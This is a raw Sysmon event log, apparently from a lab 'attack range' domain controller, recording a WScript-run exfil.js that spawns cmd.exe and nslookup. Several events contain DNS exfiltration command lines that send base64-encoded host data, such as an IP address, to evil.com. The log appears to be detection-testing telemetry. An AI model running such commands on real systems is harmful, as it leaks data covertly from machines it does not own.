14:21:37.829{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiegv.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-18F1-629A-8744-000000005F02}20208072C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8844-000000005F02}4992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8844-000000005F02}4992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-18F1-629A-8644-000000005F02}51043840C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-8844-000000005F02}4992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.798{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.805{2E1864BB-18F1-629A-8844-000000005F02}4992C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-8644-000000005F02}5104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiegv.tmp 2>&1 10341000x8000000000000000211127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.760{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8744-000000005F02}2020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.760{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8744-000000005F02}2020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.760{2E1864BB-18F1-629A-8744-000000005F02}20208072C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8644-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.744{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8744-000000005F02}2020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8644-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.729{2E1864BB-18E0-629A-6742-000000005F02}39763364C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-8644-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.739{2E1864BB-18F1-629A-8644-000000005F02}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiegv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.713{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzmd.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-18F1-629A-8444-000000005F02}60521848C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8544-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8544-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.681{2E1864BB-18F1-629A-8344-000000005F02}72087780C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-8544-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.692{2E1864BB-18F1-629A-8544-000000005F02}1368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-8344-000000005F02}7208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzmd.tmp 2>&1 10341000x8000000000000000211107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.677{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8444-000000005F02}6052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.677{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8444-000000005F02}6052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.660{2E1864BB-18F1-629A-8444-000000005F02}60521848C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8344-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.660{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8444-000000005F02}6052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 